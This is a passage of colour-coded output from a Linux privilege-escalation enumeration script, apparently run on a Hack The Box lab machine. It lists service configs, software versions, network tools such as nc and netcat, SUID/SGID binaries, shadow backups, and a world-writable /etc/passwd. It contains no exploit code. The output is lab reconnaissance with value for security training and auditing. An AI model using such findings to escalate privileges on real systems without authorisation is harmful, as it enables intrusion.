-rw-r--r--  1 0 root  426 Apr 18  2013 rsyslog.conf
-rw-r--r--  1 0 root  230 Mar 18  2011 setvtrgb.conf
-rw-r--r--  1 0 root  277 Apr 12  2014 shutdown.conf
-rw-r--r--  1 0 root  641 May  2  2014 ssh.conf
-rw-r--r--  1 0 root  711 Mar 13  2014 startpar-bridge.conf
-rw-r--r--  1 0 root 1183 Oct 29  2014 systemd-logind.conf
-rw-r--r--  1 0 root  348 Apr 12  2014 tty1.conf
-rw-r--r--  1 0 root  333 Apr 12  2014 tty2.conf
-rw-r--r--  1 0 root  333 Apr 12  2014 tty3.conf
-rw-r--r--  1 0 root  333 Apr 12  2014 tty4.conf
-rw-r--r--  1 0 root  232 Apr 12  2014 tty5.conf
-rw-r--r--  1 0 root  232 Apr 12  2014 tty6.conf
-rw-r--r--  1 0 root  645 Sep 12  2014 udev-fallback-graphics.conf
-rw-r--r--  1 0 root  768 Apr 14  2014 udev-finish.conf
-rw-r--r--  1 0 root  337 Apr 14  2014 udev.conf
-rw-r--r--  1 0 root  356 Apr 14  2014 udevmonitor.conf
-rw-r--r--  1 0 root  352 Apr 14  2014 udevtrigger.conf
-rw-r--r--  1 0 root  473 Feb 28  2014 ufw.conf
-rw-r--r--  1 0 root  412 Apr 12  2014 upstart-file-bridge.conf
-rw-r--r--  1 0 root  329 Apr 12  2014 upstart-socket-bridge.conf
-rw-r--r--  1 0 root  553 Apr 12  2014 upstart-udev-bridge.conf
-rw-r--r--  1 0 root  683 Mar 25  2013 ureadahead-other.conf
-rw-r--r--  1 0 root  889 Mar 25  2013 ureadahead.conf
-rw-r--r--  1 0 root 1521 Apr 12  2014 wait-for-state.conf


[00;31m[-] /lib/systemd/* config file permissions:[00m
/lib/systemd/:
total 736K
drwxr-xr-x 6 0 root 4.0K Jan 11 14:18 system
-rwxr-xr-x 1 0 root  66K Feb  7  2017 systemd-hostnamed
-rwxr-xr-x 1 0 root  70K Feb  7  2017 systemd-localed
-rwxr-xr-x 1 0 root 254K Feb  7  2017 systemd-logind
-rwxr-xr-x 1 0 root  22K Feb  7  2017 systemd-multi-seat-x
-rwxr-xr-x 1 0 root  78K Feb  7  2017 systemd-timedated
-rwxr-xr-x 1 0 root 230K Feb  7  2017 systemd-udevd

/lib/systemd/system:
total 100K
drwxr-xr-x 2 0 root 4.0K Jan 11 14:18 dbus.target.wants
drwxr-xr-x 2 0 root 4.0K Jan 11 14:18 multi-user.target.wants
drwxr-xr-x 2 0 root 4.0K Jan 11 14:18 sockets.target.wants
drwxr-xr-x 2 0 root 4.0K Jan 11 14:18 sysinit.target.wants
-rw-r--r-- 1 0 root  339 Apr 13  2017 bind9-resolvconf.service
-rw-r--r-- 1 0 root  239 Apr 13  2017 bind9.service
lrwxrwxrwx 1 0 root   21 Feb  7  2017 udev.service -> systemd-udevd.service
-rw-r--r-- 1 0 root  823 Feb  7  2017 systemd-udev-settle.service
-rw-r--r-- 1 0 root  715 Feb  7  2017 systemd-udev-trigger.service
-rw-r--r-- 1 0 root  578 Feb  7  2017 systemd-udevd-control.socket
-rw-r--r-- 1 0 root  575 Feb  7  2017 systemd-udevd-kernel.socket
-rw-r--r-- 1 0 root  788 Feb  7  2017 systemd-udevd.service
-rw-r--r-- 1 0 root  347 Dec  7  2016 dbus.service
-rw-r--r-- 1 0 root  106 Dec  7  2016 dbus.socket
-rw-r--r-- 1 0 root  188 Jan 20  2016 rsync.service
-rw-r--r-- 1 0 root  248 Nov  9  2015 wpa_supplicant.service
-rw-r--r-- 1 0 root  199 May  6  2015 rsyslog.service
-rwxr-xr-x 1 0 root  251 Jun 17  2014 open-vm-tools.service
-rw-r--r-- 1 0 root  344 May  2  2014 ssh.service
-rw-r--r-- 1 0 root  216 May  2  2014 ssh.socket
-rw-r--r-- 1 0 root  196 May  2  2014 ssh@.service
-rw-r--r-- 1 0 root  155 Apr  3  2014 acpid.service
-rw-r--r-- 1 0 root  115 Apr  3  2014 acpid.socket
-rw-r--r-- 1 0 root  272 Feb  5  2014 sudo.service
-rw-r--r-- 1 0 root  124 Oct 21  2013 atd.service
-rw-r--r-- 1 0 root  182 Oct 15  2013 polkitd.service

/lib/systemd/system/dbus.target.wants:
total 0
lrwxrwxrwx 1 0 root 14 Dec  7  2016 dbus.socket -> ../dbus.socket

/lib/systemd/system/multi-user.target.wants:
total 0
lrwxrwxrwx 1 0 root 15 Dec  7  2016 dbus.service -> ../dbus.service

/lib/systemd/system/sockets.target.wants:
total 0
lrwxrwxrwx 1 0 root 31 Feb  7  2017 systemd-udevd-control.socket -> ../systemd-udevd-control.socket
lrwxrwxrwx 1 0 root 30 Feb  7  2017 systemd-udevd-kernel.socket -> ../systemd-udevd-kernel.socket
lrwxrwxrwx 1 0 root 14 Dec  7  2016 dbus.socket -> ../dbus.socket

/lib/systemd/system/sysinit.target.wants:
total 0
lrwxrwxrwx 1 0 root 31 Feb  7  2017 systemd-udev-trigger.service -> ../systemd-udev-trigger.service
lrwxrwxrwx 1 0 root 24 Feb  7  2017 systemd-udevd.service -> ../systemd-udevd.service


[00;33m### SOFTWARE #############################################[00m
[00;31m[-] Sudo version:[00m
Sudo version 1.8.9p5


[00;31m[-] MYSQL version:[00m
mysql  Ver 14.14 Distrib 5.5.55, for debian-linux-gnu (i686) using readline 6.3


[00;31m[-] Apache version:[00m
Server version: Apache/2.4.7 (Ubuntu)
Server built:   May  9 2017 16:13:38


[00;31m[-] Apache user configuration:[00m
APACHE_RUN_USER=www-data
APACHE_RUN_GROUP=www-data


[00;31m[-] Installed Apache modules:[00m
Loaded Modules:
 core_module (static)
 so_module (static)
 watchdog_module (static)
 http_module (static)
 log_config_module (static)
 logio_module (static)
 version_module (static)
 unixd_module (static)
 access_compat_module (shared)
 alias_module (shared)
 auth_basic_module (shared)
 authn_core_module (shared)
 authn_file_module (shared)
 authz_core_module (shared)
 authz_host_module (shared)
 authz_user_module (shared)
 autoindex_module (shared)
 deflate_module (shared)
 dir_module (shared)
 env_module (shared)
 fcgid_module (shared)
 filter_module (shared)
 include_module (shared)
 mime_module (shared)
 mpm_prefork_module (shared)
 negotiation_module (shared)
 php5_module (shared)
 rewrite_module (shared)
 setenvif_module (shared)
 status_module (shared)
 suexec_module (shared)


[00;33m### INTERESTING FILES ####################################[00m
[00;31m[-] Useful file locations:[00m
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/nmap
/usr/bin/gcc
/usr/bin/curl


[00;31m[-] Installed compilers:[00m
ii  g++                                4:4.8.2-1ubuntu6                           i386         GNU C++ compiler
ii  g++-4.8                            4.8.4-2ubuntu1~14.04.3                     i386         GNU C++ compiler
ii  gcc                                4:4.8.2-1ubuntu6                           i386         GNU C compiler
ii  gcc-4.8                            4.8.4-2ubuntu1~14.04.3                     i386         GNU C compiler


[00;31m[-] Can we read/write sensitive files:[00m
-rw-rw-rw- 1 0 root 1275 Jan 14 20:00 /etc/passwd
-rw-r--r-- 1 0 root 707 May 28  2017 /etc/group
-rw-r--r-- 1 0 root 665 Feb 20  2014 /etc/profile
-rw-r----- 1 0 shadow 895 Jun 14  2017 /etc/shadow


[00;31m[-] SUID files:[00m
-rwsr-xr-x 1 0 root 112204 Jun 14  2017 /var/htb/bin/emergency
-rwsr-xr-x 1 0 root 5480 Mar 27  2017 /usr/lib/eject/dmcrypt-get-device
-rwsr-xr-x 1 0 root 492972 Aug 11  2016 /usr/lib/openssh/ssh-keysign
-rwsr-xr-- 1 0 messagebus 333952 Dec  7  2016 /usr/lib/dbus-1.0/dbus-daemon-launch-helper
-rwsr-xr-x 1 0 root 9808 Nov 24  2015 /usr/lib/policykit-1/polkit-agent-helper-1
-rwsr-sr-x 1 daemon daemon 46652 Oct 21  2013 /usr/bin/at
-rwsr-xr-x 1 0 root 35916 May 17  2017 /usr/bin/chsh
-rwsr-xr-x 1 0 root 45420 May 17  2017 /usr/bin/passwd
-rwsr-xr-x 1 0 root 44620 May 17  2017 /usr/bin/chfn
-rwsr-xr-x 1 0 root 18168 Nov 24  2015 /usr/bin/pkexec
-rwsr-xr-x 1 0 root 30984 May 17  2017 /usr/bin/newgrp
-rwsr-xr-x 1 0 root 18136 May  8  2014 /usr/bin/traceroute6.iputils
-rwsr-xr-x 1 0 root 66284 May 17  2017 /usr/bin/gpasswd
-rwsr-xr-x 1 0 root 156708 May 29  2017 /usr/bin/sudo
-rwsr-xr-x 1 0 root 72860 Oct 21  2013 /usr/bin/mtr
-rwsr-sr-x 1 libuuid libuuid 17996 Nov 24  2016 /usr/sbin/uuidd
-rwsr-xr-- 1 0 dip 323000 Apr 21  2015 /usr/sbin/pppd
-rwsr-xr-x 1 0 root 38932 May  8  2014 /bin/ping
-rwsr-xr-x 1 0 root 43316 May  8  2014 /bin/ping6
-rwsr-xr-x 1 0 root 35300 May 17  2017 /bin/su
-rwsr-xr-x 1 0 root 30112 May 15  2015 /bin/fusermount
-rwsr-xr-x 1 0 root 88752 Nov 24  2016 /bin/mount
-rwsr-xr-x 1 0 root 67704 Nov 24  2016 /bin/umount


[00;31m[-] SGID files:[00m
-rwsr-sr-x 1 daemon daemon 46652 Oct 21  2013 /usr/bin/at
-rwxr-sr-x 3 0 mail 9704 Dec  4  2012 /usr/bin/mail-lock
-rwxr-sr-x 1 0 utmp 406700 Nov  7  2013 /usr/bin/screen
-rwxr-sr-x 1 0 mlocate 34452 Jun 20  2013 /usr/bin/mlocate
-rwxr-sr-x 1 0 tty 9748 Jun  4  2013 /usr/bin/bsd-write
-rwxr-sr-x 1 0 ssh 329144 Aug 11  2016 /usr/bin/ssh-agent
-rwxr-sr-x 1 0 shadow 53516 May 17  2017 /usr/bin/chage
-rwxr-sr-x 1 0 tty 18056 Nov 24  2016 /usr/bin/wall
-rwxr-sr-x 1 0 shadow 18208 May 17  2017 /usr/bin/expiry
-rwxr-sr-x 3 0 mail 9704 Dec  4  2012 /usr/bin/mail-unlock
-rwxr-sr-x 3 0 mail 9704 Dec  4  2012 /usr/bin/mail-touchlock
-rwxr-sr-x 1 0 crontab 34824 Feb  9  2013 /usr/bin/crontab
-rwxr-sr-x 1 0 mail 13960 Dec  7  2013 /usr/bin/dotlockfile
-rwsr-sr-x 1 libuuid libuuid 17996 Nov 24  2016 /usr/sbin/uuidd
-rwxr-sr-x 1 0 shadow 30432 Mar 16  2016 /sbin/unix_chkpwd


[-] Can't search *.conf files as no keyword was entered

[-] Can't search *.php files as no keyword was entered

[-] Can't search *.log files as no keyword was entered

[-] Can't search *.ini files as no keyword was entered

[00;31m[-] All *.conf files in /etc (recursive 1 level):[00m
-rw-r--r-- 1 0 root 144 May 28  2017 /etc/kernel-img.conf
-rw-r--r-- 1 0 root 321 Apr 16  2014 /etc/blkid.conf
-rw-r--r-- 1 0 root 191 Dec  4  2013 /etc/libaudit.conf
-rw-r--r-- 1 0 root 1320 Aug 19  2014 /etc/rsyslog.conf
-rw-r--r-- 1 0 root 1260 Jul  1  2013 /etc/ucf.conf
-rw-r--r-- 1 0 root 92 Feb 20  2014 /etc/host.conf
-rw-r--r-- 1 0 root 4781 Nov 15  2013 /etc/hdparm.conf
-rw-r--r-- 1 0 root 2584 Oct 10  2012 /etc/gai.conf
-rw-r--r-- 1 0 root 350 May 28  2017 /etc/popularity-contest.conf
-rw-r--r-- 1 0 root 7788 May 28  2017 /etc/ca-certificates.conf
-rw-r--r-- 1 0 root 552 Feb  1  2014 /etc/pam.conf
-rw-r--r-- 1 0 root 2084 Apr  1  2013 /etc/sysctl.conf
-rw-r--r-- 1 0 root 956 Feb 19  2014 /etc/mke2fs.conf
-rw-r--r-- 1 0 root 321 Jun 20  2013 /etc/updatedb.conf
-rw-r--r-- 1 0 root 14867 May 10  2014 /etc/ltrace.conf
-rw-r--r-- 1 0 root 604 Nov  7  2013 /etc/deluser.conf
-rw-r--r-- 1 0 root 34 Aug  3  2016 /etc/ld.so.conf
-rw-r--r-- 1 0 root 2969 Feb 23  2014 /etc/debconf.conf
-rw-r--r-- 1 0 root 475 Feb 20  2014 /etc/nsswitch.conf
-rw-r--r-- 1 0 root 2981 Aug  3  2016 /etc/adduser.conf
-rw-r----- 1 0 fuse 280 May 24  2013 /etc/fuse.conf
-rw-r--r-- 1 0 root 703 Jan 22  2014 /etc/logrotate.conf
-rw-r--r-- 1 0 root 771 May 19  2013 /etc/insserv.conf


[00;31m[-] Location and contents (if accessible) of .bash_history file(s):[00m
/home/chris/.bash_history


[00;31m[-] Location and Permissions (if accessible) of .bak file(s):[00m
-rw------- 1 0 shadow 895 Jun 14  2017 /var/backups/shadow.bak
-rw------- 1 0 root 1252 May 28  2017 /var/backups/passwd.bak
-rw------- 1 0 shadow 589 May 28  2017 /var/backups/gshadow.bak
-rw------- 1 0 root 707 May 28  2017 /var/backups/group.bak


[00;31m[-] Any interesting mail in /var/mail:[00m
total 8
drwxrwsr-x  2 0 mail 4096 Jan 11 14:18 .
drwxr-xr-x 14 0 root 4096 Jan 11 14:18 ..


[00;33m### SCAN COMPLETE ####################################[00m
